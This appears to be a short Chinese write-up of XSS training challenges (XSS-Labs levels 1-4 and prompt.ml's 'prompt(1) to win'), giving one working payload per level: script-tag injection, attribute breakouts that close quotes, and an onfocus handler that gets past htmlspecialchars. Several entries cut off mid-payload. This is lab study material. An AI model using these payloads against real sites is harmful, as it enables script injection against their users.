/images/info.jpg

命运如同手中的掌纹,无论多曲折,终掌握在自己手中。

XSS-Labs

Level1 url/?name=<script>alert(1)</script> Level2 考察符号的闭合 url/?keyword='"><script>alert(1)</script> Level3 htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。考察过滤<、>、“等的绕过。 url?keyword=' autofocus onfocus=alert(1)// Level4 会删除掉<和&g

prompt(1) to win

http://prompt.ml 0x00 function escape(input) { // warm up // script should be executed without user interaction return '<input type="text" value="' + input + '">'; } 简单闭合下,构造"><script>prompt(1);<